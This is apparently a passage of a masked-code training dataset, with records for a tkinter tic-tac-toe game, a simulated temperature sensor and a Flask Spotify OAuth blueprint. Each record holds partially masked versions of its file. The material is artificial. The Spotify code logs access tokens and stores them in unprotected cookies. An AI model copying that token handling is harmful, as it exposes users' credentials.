self.main_game_window.update()
self.main_game_window.deiconify()
def create_choose_one_window(self):
self.choose_one_window = tk.Toplevel(self.main_game_window)
self.choose_one_window.title('choose one window')
self.choose_one_window.geometry('500x500')
choose_one_window_billboard = tk.StringVar(
master=self.choose_one_window, value='Choose you want')
use_O_or_X = tk.Label(self.choose_one_window, bg='yellow', width=50,
height=5, textvariable=choose_one_window_billboard)
use_O_or_X.pack()
use_O = tk.Button(self.choose_one_window, text='I want use O', width=40,
height=5, command=partial(self.set_O_or_X, 'O'))
use_O.pack()
use_X = tk.Button(self.choose_one_window, text='I want use X', width=40,
height=5, command=partial(self.set_O_or_X, 'X'))
use_X.pack()
if __name__ == '__main__':
game = SingleMode()
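
# Note (assumption, for readers of this sample): NinePalaceGame from base is
# expected to supply the pieces used above -- main_game_window, value_group,
# billboard_value, game_is_over, check_win(), check_game_over() and reset() --
# with main_game_window apparently available before super().__init__() runs,
# since create_choose_one_window() is called first; this subclass only adds the
# single-player flow (random computer moves) on top of that interface.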
|
normal
|
{
"blob_id": "841743d4e9d683827962d83a77a87c6432842add",
"index": 8013,
"step-1": "<mask token>\n\n\nclass SingleMode(NinePalaceGame):\n <mask token>\n <mask token>\n <mask token>\n\n def player_play(self, i, j):\n if not self.game_is_over and not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.dominance)\n self.dominance = self.computer\n return 1\n return 0\n\n def computer_play(self):\n if not self.game_is_over:\n while 1:\n i, j = random.choice(range(3)), random.choice(range(3))\n if not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.computer)\n self.dominance = self.player\n break\n <mask token>\n\n def reset(self):\n super().reset()\n self.dominance = self.player\n self.box = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n self.main_game_window.withdraw()\n self.choose_one_window.update()\n self.choose_one_window.deiconify()\n\n def button_function(self, i, j):\n if self.player_play(i, j):\n self.judge()\n self.computer_play()\n self.judge()\n <mask token>\n\n def create_choose_one_window(self):\n self.choose_one_window = tk.Toplevel(self.main_game_window)\n self.choose_one_window.title('choose one window')\n self.choose_one_window.geometry('500x500')\n choose_one_window_billboard = tk.StringVar(master=self.\n choose_one_window, value='Choose you want')\n use_O_or_X = tk.Label(self.choose_one_window, bg='yellow', width=50,\n height=5, textvariable=choose_one_window_billboard)\n use_O_or_X.pack()\n use_O = tk.Button(self.choose_one_window, text='I want use O',\n width=40, height=5, command=partial(self.set_O_or_X, 'O'))\n use_O.pack()\n use_X = tk.Button(self.choose_one_window, text='I want use X',\n width=40, height=5, command=partial(self.set_O_or_X, 'X'))\n use_X.pack()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SingleMode(NinePalaceGame):\n <mask token>\n <mask token>\n <mask token>\n\n def player_play(self, i, j):\n if not self.game_is_over and not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.dominance)\n self.dominance = self.computer\n return 1\n return 0\n\n def computer_play(self):\n if not self.game_is_over:\n while 1:\n i, j = random.choice(range(3)), random.choice(range(3))\n if not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.computer)\n self.dominance = self.player\n break\n <mask token>\n\n def reset(self):\n super().reset()\n self.dominance = self.player\n self.box = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n self.main_game_window.withdraw()\n self.choose_one_window.update()\n self.choose_one_window.deiconify()\n\n def button_function(self, i, j):\n if self.player_play(i, j):\n self.judge()\n self.computer_play()\n self.judge()\n\n def set_O_or_X(self, use):\n self.player = use\n if use == 'X':\n self.computer = 'O'\n self.computer_play()\n else:\n self.computer = 'X'\n self.dominance = self.player\n self.choose_one_window.withdraw()\n self.main_game_window.update()\n self.main_game_window.deiconify()\n\n def create_choose_one_window(self):\n self.choose_one_window = tk.Toplevel(self.main_game_window)\n self.choose_one_window.title('choose one window')\n self.choose_one_window.geometry('500x500')\n choose_one_window_billboard = tk.StringVar(master=self.\n choose_one_window, value='Choose you want')\n use_O_or_X = tk.Label(self.choose_one_window, bg='yellow', width=50,\n height=5, textvariable=choose_one_window_billboard)\n use_O_or_X.pack()\n use_O = tk.Button(self.choose_one_window, text='I want use O',\n width=40, height=5, command=partial(self.set_O_or_X, 'O'))\n use_O.pack()\n use_X = tk.Button(self.choose_one_window, text='I want use X',\n width=40, height=5, command=partial(self.set_O_or_X, 'X'))\n use_X.pack()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SingleMode(NinePalaceGame):\n <mask token>\n <mask token>\n\n def __init__(self):\n self.create_choose_one_window()\n super().__init__()\n self.main_game_window.mainloop()\n\n def player_play(self, i, j):\n if not self.game_is_over and not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.dominance)\n self.dominance = self.computer\n return 1\n return 0\n\n def computer_play(self):\n if not self.game_is_over:\n while 1:\n i, j = random.choice(range(3)), random.choice(range(3))\n if not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.computer)\n self.dominance = self.player\n break\n\n def judge(self):\n if self.check_win(self.player):\n self.game_is_over = 1\n self.billboard_value.set('Player is win!')\n elif self.check_win(self.computer):\n self.game_is_over = 1\n self.billboard_value.set('Computer is win!')\n elif self.check_game_over():\n self.game_is_over = 1\n self.billboard_value.set('Game over!')\n\n def reset(self):\n super().reset()\n self.dominance = self.player\n self.box = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n self.main_game_window.withdraw()\n self.choose_one_window.update()\n self.choose_one_window.deiconify()\n\n def button_function(self, i, j):\n if self.player_play(i, j):\n self.judge()\n self.computer_play()\n self.judge()\n\n def set_O_or_X(self, use):\n self.player = use\n if use == 'X':\n self.computer = 'O'\n self.computer_play()\n else:\n self.computer = 'X'\n self.dominance = self.player\n self.choose_one_window.withdraw()\n self.main_game_window.update()\n self.main_game_window.deiconify()\n\n def create_choose_one_window(self):\n self.choose_one_window = tk.Toplevel(self.main_game_window)\n self.choose_one_window.title('choose one window')\n self.choose_one_window.geometry('500x500')\n choose_one_window_billboard = tk.StringVar(master=self.\n choose_one_window, value='Choose you want')\n use_O_or_X = tk.Label(self.choose_one_window, bg='yellow', width=50,\n height=5, textvariable=choose_one_window_billboard)\n use_O_or_X.pack()\n use_O = tk.Button(self.choose_one_window, text='I want use O',\n width=40, height=5, command=partial(self.set_O_or_X, 'O'))\n use_O.pack()\n use_X = tk.Button(self.choose_one_window, text='I want use X',\n width=40, height=5, command=partial(self.set_O_or_X, 'X'))\n use_X.pack()\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass SingleMode(NinePalaceGame):\n player1 = player = 'O'\n player2 = computer = 'X'\n\n def __init__(self):\n self.create_choose_one_window()\n super().__init__()\n self.main_game_window.mainloop()\n\n def player_play(self, i, j):\n if not self.game_is_over and not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.dominance)\n self.dominance = self.computer\n return 1\n return 0\n\n def computer_play(self):\n if not self.game_is_over:\n while 1:\n i, j = random.choice(range(3)), random.choice(range(3))\n if not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.computer)\n self.dominance = self.player\n break\n\n def judge(self):\n if self.check_win(self.player):\n self.game_is_over = 1\n self.billboard_value.set('Player is win!')\n elif self.check_win(self.computer):\n self.game_is_over = 1\n self.billboard_value.set('Computer is win!')\n elif self.check_game_over():\n self.game_is_over = 1\n self.billboard_value.set('Game over!')\n\n def reset(self):\n super().reset()\n self.dominance = self.player\n self.box = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n self.main_game_window.withdraw()\n self.choose_one_window.update()\n self.choose_one_window.deiconify()\n\n def button_function(self, i, j):\n if self.player_play(i, j):\n self.judge()\n self.computer_play()\n self.judge()\n\n def set_O_or_X(self, use):\n self.player = use\n if use == 'X':\n self.computer = 'O'\n self.computer_play()\n else:\n self.computer = 'X'\n self.dominance = self.player\n self.choose_one_window.withdraw()\n self.main_game_window.update()\n self.main_game_window.deiconify()\n\n def create_choose_one_window(self):\n self.choose_one_window = tk.Toplevel(self.main_game_window)\n self.choose_one_window.title('choose one window')\n self.choose_one_window.geometry('500x500')\n choose_one_window_billboard = tk.StringVar(master=self.\n choose_one_window, value='Choose you want')\n use_O_or_X = tk.Label(self.choose_one_window, bg='yellow', width=50,\n height=5, textvariable=choose_one_window_billboard)\n use_O_or_X.pack()\n use_O = tk.Button(self.choose_one_window, text='I want use O',\n width=40, height=5, command=partial(self.set_O_or_X, 'O'))\n use_O.pack()\n use_X = tk.Button(self.choose_one_window, text='I want use X',\n width=40, height=5, command=partial(self.set_O_or_X, 'X'))\n use_X.pack()\n\n\nif __name__ == '__main__':\n game = SingleMode()\n",
"step-5": "import tkinter as tk\nfrom functools import partial\nfrom numpy import random\nfrom base import NinePalaceGame\n\n\nclass SingleMode(NinePalaceGame):\n player1 = player = 'O'\n player2 = computer = 'X'\n\n def __init__(self):\n self.create_choose_one_window()\n super().__init__()\n\n self.main_game_window.mainloop()\n\n def player_play(self, i, j):\n if not self.game_is_over and not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.dominance)\n self.dominance = self.computer\n return 1\n return 0\n\n def computer_play(self):\n if not self.game_is_over:\n while 1:\n i, j = random.choice(range(3)), random.choice(range(3))\n if not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.computer)\n self.dominance = self.player\n break\n\n def judge(self):\n if self.check_win(self.player):\n self.game_is_over = 1\n self.billboard_value.set('Player is win!')\n elif self.check_win(self.computer):\n self.game_is_over = 1\n self.billboard_value.set('Computer is win!')\n elif self.check_game_over():\n self.game_is_over = 1\n self.billboard_value.set('Game over!')\n\n def reset(self):\n super().reset()\n self.dominance = self.player\n self.box = [\n [0, 0, 0], [0, 0, 0], [0, 0, 0]]\n\n self.main_game_window.withdraw()\n self.choose_one_window.update()\n self.choose_one_window.deiconify()\n\n def button_function(self, i, j):\n if self.player_play(i, j):\n self.judge()\n self.computer_play()\n self.judge()\n\n def set_O_or_X(self, use):\n self.player = use\n if use == 'X':\n self.computer = 'O'\n self.computer_play()\n else:\n self.computer = 'X'\n self.dominance = self.player\n self.choose_one_window.withdraw()\n self.main_game_window.update()\n self.main_game_window.deiconify()\n\n def create_choose_one_window(self):\n self.choose_one_window = tk.Toplevel(self.main_game_window)\n self.choose_one_window.title('choose one window')\n self.choose_one_window.geometry('500x500')\n\n choose_one_window_billboard = tk.StringVar(\n master=self.choose_one_window, value='Choose you want')\n use_O_or_X = tk.Label(self.choose_one_window, bg='yellow', width=50,\n height=5, textvariable=choose_one_window_billboard)\n use_O_or_X.pack()\n\n use_O = tk.Button(self.choose_one_window, text='I want use O', width=40,\n height=5, command=partial(self.set_O_or_X, 'O'))\n use_O.pack()\n use_X = tk.Button(self.choose_one_window, text='I want use X', width=40,\n height=5, command=partial(self.set_O_or_X, 'X'))\n use_X.pack()\n\n\nif __name__ == '__main__':\n game = SingleMode()\n",
"step-ids": [
6,
7,
9,
11,
13
]
}
|
[
6,
7,
9,
11,
13
] |
from random import random
import numpy as np
class TemperatureSensor:
sensor_type = "temperature"
unit="celsius"
instance_id="283h62gsj"
#initialisation
def __init__(self, average_temperature, temperature_variation, min_temperature, max_temperature):
self.average_temperature = average_temperature
self.temperature_variation = temperature_variation
self.min_temperature = min_temperature
self.max_temperature= max_temperature
self.value = 0.0 #initialise current temp value
#sensing
def sense(self):
#self.value = self.value + self.simple_random()
self.value = self.complex_random() + self.noise()
return self.value
#noise
def noise(self):
self.noise_value = np.random.normal(0,1)
return self.noise_value
#helper function for generating values with min temp as its base
def simple_random(self):
value = self.min_temperature + (random() * (self.max_temperature - self.min_temperature)) #so that it is in the range
return value
def complex_random(self):
value = self.average_temperature * (1 + (self.temperature_variation/100) * (1 * random() -1))
value = max(value,self.min_temperature)
value = min(value,self.max_temperature)
return value
#creating instance of sensor
ts = TemperatureSensor(25,10,16,35)
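
# Usage sketch (illustrative readings, not part of the original script): each
# call returns a draw derived from the 25 C average, clamped to [16, 35],
# plus N(0, 1) noise.
#
#   >>> ts.sense()   # e.g. 24.7
#   >>> ts.sense()   # e.g. 23.9 -- each call produces a fresh value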
|
normal
|
{
"blob_id": "bc890f0f40a7e9c916628d491e473b5ecfa9bb9b",
"index": 740,
"step-1": "<mask token>\n\n\nclass TemperatureSensor:\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, average_temperature, temperature_variation,\n min_temperature, max_temperature):\n self.average_temperature = average_temperature\n self.temperature_variation = temperature_variation\n self.min_temperature = min_temperature\n self.max_temperature = max_temperature\n self.value = 0.0\n <mask token>\n\n def noise(self):\n self.noise_value = np.random.normal(0, 1)\n return self.noise_value\n\n def simple_random(self):\n value = self.min_temperature + random() * (self.max_temperature -\n self.min_temperature)\n return value\n\n def complex_random(self):\n value = self.average_temperature * (1 + self.temperature_variation /\n 100 * (1 * random() - 1))\n value = max(value, self.min_temperature)\n value = min(value, self.max_temperature)\n return value\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TemperatureSensor:\n sensor_type = 'temperature'\n unit = 'celsius'\n instance_id = '283h62gsj'\n\n def __init__(self, average_temperature, temperature_variation,\n min_temperature, max_temperature):\n self.average_temperature = average_temperature\n self.temperature_variation = temperature_variation\n self.min_temperature = min_temperature\n self.max_temperature = max_temperature\n self.value = 0.0\n\n def sense(self):\n self.value = self.complex_random() + self.noise()\n return self.value\n\n def noise(self):\n self.noise_value = np.random.normal(0, 1)\n return self.noise_value\n\n def simple_random(self):\n value = self.min_temperature + random() * (self.max_temperature -\n self.min_temperature)\n return value\n\n def complex_random(self):\n value = self.average_temperature * (1 + self.temperature_variation /\n 100 * (1 * random() - 1))\n value = max(value, self.min_temperature)\n value = min(value, self.max_temperature)\n return value\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TemperatureSensor:\n sensor_type = 'temperature'\n unit = 'celsius'\n instance_id = '283h62gsj'\n\n def __init__(self, average_temperature, temperature_variation,\n min_temperature, max_temperature):\n self.average_temperature = average_temperature\n self.temperature_variation = temperature_variation\n self.min_temperature = min_temperature\n self.max_temperature = max_temperature\n self.value = 0.0\n\n def sense(self):\n self.value = self.complex_random() + self.noise()\n return self.value\n\n def noise(self):\n self.noise_value = np.random.normal(0, 1)\n return self.noise_value\n\n def simple_random(self):\n value = self.min_temperature + random() * (self.max_temperature -\n self.min_temperature)\n return value\n\n def complex_random(self):\n value = self.average_temperature * (1 + self.temperature_variation /\n 100 * (1 * random() - 1))\n value = max(value, self.min_temperature)\n value = min(value, self.max_temperature)\n return value\n\n\nts = TemperatureSensor(25, 10, 16, 35)\n",
"step-4": "from random import random\nimport numpy as np\n\n\nclass TemperatureSensor:\n sensor_type = 'temperature'\n unit = 'celsius'\n instance_id = '283h62gsj'\n\n def __init__(self, average_temperature, temperature_variation,\n min_temperature, max_temperature):\n self.average_temperature = average_temperature\n self.temperature_variation = temperature_variation\n self.min_temperature = min_temperature\n self.max_temperature = max_temperature\n self.value = 0.0\n\n def sense(self):\n self.value = self.complex_random() + self.noise()\n return self.value\n\n def noise(self):\n self.noise_value = np.random.normal(0, 1)\n return self.noise_value\n\n def simple_random(self):\n value = self.min_temperature + random() * (self.max_temperature -\n self.min_temperature)\n return value\n\n def complex_random(self):\n value = self.average_temperature * (1 + self.temperature_variation /\n 100 * (1 * random() - 1))\n value = max(value, self.min_temperature)\n value = min(value, self.max_temperature)\n return value\n\n\nts = TemperatureSensor(25, 10, 16, 35)\n",
"step-5": "from random import random\r\n\r\nimport numpy as np\r\n\r\nclass TemperatureSensor:\r\n sensor_type = \"temperature\"\r\n unit=\"celsius\"\r\n instance_id=\"283h62gsj\"\r\n \r\n #initialisation\r\n \r\n def __init__(self, average_temperature, temperature_variation, min_temperature, max_temperature):\r\n self.average_temperature = average_temperature\r\n self.temperature_variation = temperature_variation\r\n self.min_temperature = min_temperature \r\n self.max_temperature= max_temperature\r\n self.value = 0.0 #initialise current temp value\r\n \r\n #sensing \r\n def sense(self):\r\n #self.value = self.value + self.simple_random()\r\n self.value = self.complex_random() + self.noise()\r\n return self.value\r\n \r\n #noise\r\n def noise(self):\r\n self.noise_value = np.random.normal(0,1)\r\n return self.noise_value\r\n \r\n #helper function for generating values with min temp as its base\r\n def simple_random(self):\r\n value = self.min_temperature + (random() * (self.max_temperature - self.min_temperature)) #so that it is in the range\r\n return value\r\n \r\n def complex_random(self):\r\n value = self.average_temperature * (1 + (self.temperature_variation/100) * (1 * random() -1))\r\n value = max(value,self.min_temperature)\r\n value = min(value,self.max_temperature)\r\n return value\r\n \r\n#creating instance of sensor\r\nts = TemperatureSensor(25,10,16,35)\r\n\r\n",
"step-ids": [
5,
7,
8,
9,
10
]
}
|
[
5,
7,
8,
9,
10
] |
import os
import base64
from urllib.parse import urlencode
import json
from flask import Blueprint, request, redirect, jsonify, make_response
import requests
spotify = Blueprint('spotify', __name__)
# Client Keys
SPOTIFY_CLIENT_ID = os.environ.get('SPOTIFY_CLIENT_ID')
SPOTIFY_CLIENT_SECRET = os.environ.get('SPOTIFY_CLIENT_SECRET')
# Spotify URLS
SPOTIFY_AUTH_URL = "https://accounts.spotify.com/authorize"
SPOTIFY_TOKEN_URL = "https://accounts.spotify.com/api/token"
SPOTIFY_API_BASE_URL = "https://api.spotify.com"
API_VERSION = "v1"
SPOTIFY_API_URL = "{}/{}".format(SPOTIFY_API_BASE_URL, API_VERSION)
# Server-side Parameters
CLIENT_SIDE_URL = "http://localhost"
PORT = 8888
REDIRECT_URI = "{}:{}/callback".format(CLIENT_SIDE_URL, PORT)
SCOPE = "playlist-modify-public playlist-modify-private user-read-currently-playing"
STATE = ""
SHOW_DIALOG_BOOL = True
SHOW_DIALOG_STR = str(SHOW_DIALOG_BOOL).lower()
auth_query_parameters = {
"response_type": "code",
"redirect_uri": REDIRECT_URI,
"scope": SCOPE,
# "state": STATE,
# "show_dialog": SHOW_DIALOG_str,
"client_id": SPOTIFY_CLIENT_ID
}
@spotify.route("/login")
def login():
# Auth Step 1: Authorization
url_args = urlencode(auth_query_parameters)
print(url_args)
auth_url = "{}/?{}".format(SPOTIFY_AUTH_URL, url_args)
return redirect(auth_url)
@spotify.route("/callback")
def callback():
# Auth Step 4: Requests refresh and access tokens
auth_code = request.args['code']
code_payload = {
"grant_type": "authorization_code",
"code": str(auth_code),
"redirect_uri": REDIRECT_URI
}
base64encoded = base64.b64encode(bytes("{}:{}".format(SPOTIFY_CLIENT_ID, SPOTIFY_CLIENT_SECRET), 'utf-8'))
headers = {"Authorization": "Basic {}".format(base64encoded.decode('utf-8'))}
post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload, headers=headers)
# Auth Step 5: Tokens are Returned to Application
response_data = json.loads(post_request.text)
access_token = response_data["access_token"]
print(access_token)
refresh_token = response_data["refresh_token"]
token_type = response_data["token_type"]
expires_in = response_data["expires_in"]
redirect_to_index = redirect("http://localhost:3000/")
response = make_response(redirect_to_index)
response.set_cookie('access_token', value=access_token)
response.set_cookie('refresh_token', value=refresh_token)
return response
@spotify.route("/refresh_token", methods=['POST'])
def refresh_token():
# 7. Requesting access token from refresh token
r = request.get_json()
refresh_token = r['refresh_token']
code_payload = {
"grant_type": "refresh_token",
"refresh_token": refresh_token
}
base64encoded = base64.b64encode(bytes("{}:{}".format(SPOTIFY_CLIENT_ID, SPOTIFY_CLIENT_SECRET), 'utf-8'))
headers = {"Authorization": "Basic {}".format(base64encoded.decode('utf-8'))}
post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload, headers=headers)
response_data = json.loads(post_request.text)
return jsonify(response_data)
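
# Example client call for the refresh endpoint (illustrative; assumes the
# blueprint is mounted at the application root and the app listens on the same
# port 8888 used in REDIRECT_URI):
#
#   curl -X POST http://localhost:8888/refresh_token \
#        -H "Content-Type: application/json" \
#        -d '{"refresh_token": "<value of the refresh_token cookie>"}'
#
# The handler reads request.get_json()['refresh_token'] and returns Spotify's
# token response verbatim as JSON.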
|
normal
|
{
"blob_id": "f080191fec4e56adc4013da74c840817e88caf56",
"index": 869,
"step-1": "<mask token>\n\n\[email protected]('/callback')\ndef callback():\n auth_code = request.args['code']\n code_payload = {'grant_type': 'authorization_code', 'code': str(\n auth_code), 'redirect_uri': REDIRECT_URI}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n access_token = response_data['access_token']\n print(access_token)\n refresh_token = response_data['refresh_token']\n token_type = response_data['token_type']\n expires_in = response_data['expires_in']\n redirect_to_index = redirect('http://localhost:3000/')\n response = make_response(redirect_to_index)\n response.set_cookie('access_token', value=access_token)\n response.set_cookie('refresh_token', value=refresh_token)\n return response\n\n\[email protected]('/refresh_token', methods=['POST'])\ndef refresh_token():\n r = request.get_json()\n refresh_token = r['refresh_token']\n code_payload = {'grant_type': 'refresh_token', 'refresh_token':\n refresh_token}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n return jsonify(response_data)\n",
"step-2": "<mask token>\n\n\[email protected]('/login')\ndef login():\n url_args = urlencode(auth_query_parameters)\n print(url_args)\n auth_url = '{}/?{}'.format(SPOTIFY_AUTH_URL, url_args)\n return redirect(auth_url)\n\n\[email protected]('/callback')\ndef callback():\n auth_code = request.args['code']\n code_payload = {'grant_type': 'authorization_code', 'code': str(\n auth_code), 'redirect_uri': REDIRECT_URI}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n access_token = response_data['access_token']\n print(access_token)\n refresh_token = response_data['refresh_token']\n token_type = response_data['token_type']\n expires_in = response_data['expires_in']\n redirect_to_index = redirect('http://localhost:3000/')\n response = make_response(redirect_to_index)\n response.set_cookie('access_token', value=access_token)\n response.set_cookie('refresh_token', value=refresh_token)\n return response\n\n\[email protected]('/refresh_token', methods=['POST'])\ndef refresh_token():\n r = request.get_json()\n refresh_token = r['refresh_token']\n code_payload = {'grant_type': 'refresh_token', 'refresh_token':\n refresh_token}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n return jsonify(response_data)\n",
"step-3": "<mask token>\nspotify = Blueprint('spotify', __name__)\nSPOTIFY_CLIENT_ID = os.environ.get('SPOTIFY_CLIENT_ID')\nSPOTIFY_CLIENT_SECRET = os.environ.get('SPOTIFY_CLIENT_SECRET')\nSPOTIFY_AUTH_URL = 'https://accounts.spotify.com/authorize'\nSPOTIFY_TOKEN_URL = 'https://accounts.spotify.com/api/token'\nSPOTIFY_API_BASE_URL = 'https://api.spotify.com'\nAPI_VERSION = 'v1'\nSPOTIFY_API_URL = '{}/{}'.format(SPOTIFY_API_BASE_URL, API_VERSION)\nCLIENT_SIDE_URL = 'http://localhost'\nPORT = 8888\nREDIRECT_URI = '{}:{}/callback'.format(CLIENT_SIDE_URL, PORT)\nSCOPE = (\n 'playlist-modify-public playlist-modify-private user-read-currently-playing'\n )\nSTATE = ''\nSHOW_DIALOG_BOOL = True\nSHOW_DIALOG_STR = str(SHOW_DIALOG_BOOL).lower()\nauth_query_parameters = {'response_type': 'code', 'redirect_uri':\n REDIRECT_URI, 'scope': SCOPE, 'client_id': SPOTIFY_CLIENT_ID}\n\n\[email protected]('/login')\ndef login():\n url_args = urlencode(auth_query_parameters)\n print(url_args)\n auth_url = '{}/?{}'.format(SPOTIFY_AUTH_URL, url_args)\n return redirect(auth_url)\n\n\[email protected]('/callback')\ndef callback():\n auth_code = request.args['code']\n code_payload = {'grant_type': 'authorization_code', 'code': str(\n auth_code), 'redirect_uri': REDIRECT_URI}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n access_token = response_data['access_token']\n print(access_token)\n refresh_token = response_data['refresh_token']\n token_type = response_data['token_type']\n expires_in = response_data['expires_in']\n redirect_to_index = redirect('http://localhost:3000/')\n response = make_response(redirect_to_index)\n response.set_cookie('access_token', value=access_token)\n response.set_cookie('refresh_token', value=refresh_token)\n return response\n\n\[email protected]('/refresh_token', methods=['POST'])\ndef refresh_token():\n r = request.get_json()\n refresh_token = r['refresh_token']\n code_payload = {'grant_type': 'refresh_token', 'refresh_token':\n refresh_token}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n return jsonify(response_data)\n",
"step-4": "import os\nimport base64\nfrom urllib.parse import urlencode\nimport json\nfrom flask import Blueprint, request, redirect, jsonify, make_response\nimport requests\nspotify = Blueprint('spotify', __name__)\nSPOTIFY_CLIENT_ID = os.environ.get('SPOTIFY_CLIENT_ID')\nSPOTIFY_CLIENT_SECRET = os.environ.get('SPOTIFY_CLIENT_SECRET')\nSPOTIFY_AUTH_URL = 'https://accounts.spotify.com/authorize'\nSPOTIFY_TOKEN_URL = 'https://accounts.spotify.com/api/token'\nSPOTIFY_API_BASE_URL = 'https://api.spotify.com'\nAPI_VERSION = 'v1'\nSPOTIFY_API_URL = '{}/{}'.format(SPOTIFY_API_BASE_URL, API_VERSION)\nCLIENT_SIDE_URL = 'http://localhost'\nPORT = 8888\nREDIRECT_URI = '{}:{}/callback'.format(CLIENT_SIDE_URL, PORT)\nSCOPE = (\n 'playlist-modify-public playlist-modify-private user-read-currently-playing'\n )\nSTATE = ''\nSHOW_DIALOG_BOOL = True\nSHOW_DIALOG_STR = str(SHOW_DIALOG_BOOL).lower()\nauth_query_parameters = {'response_type': 'code', 'redirect_uri':\n REDIRECT_URI, 'scope': SCOPE, 'client_id': SPOTIFY_CLIENT_ID}\n\n\[email protected]('/login')\ndef login():\n url_args = urlencode(auth_query_parameters)\n print(url_args)\n auth_url = '{}/?{}'.format(SPOTIFY_AUTH_URL, url_args)\n return redirect(auth_url)\n\n\[email protected]('/callback')\ndef callback():\n auth_code = request.args['code']\n code_payload = {'grant_type': 'authorization_code', 'code': str(\n auth_code), 'redirect_uri': REDIRECT_URI}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n access_token = response_data['access_token']\n print(access_token)\n refresh_token = response_data['refresh_token']\n token_type = response_data['token_type']\n expires_in = response_data['expires_in']\n redirect_to_index = redirect('http://localhost:3000/')\n response = make_response(redirect_to_index)\n response.set_cookie('access_token', value=access_token)\n response.set_cookie('refresh_token', value=refresh_token)\n return response\n\n\[email protected]('/refresh_token', methods=['POST'])\ndef refresh_token():\n r = request.get_json()\n refresh_token = r['refresh_token']\n code_payload = {'grant_type': 'refresh_token', 'refresh_token':\n refresh_token}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n return jsonify(response_data)\n",
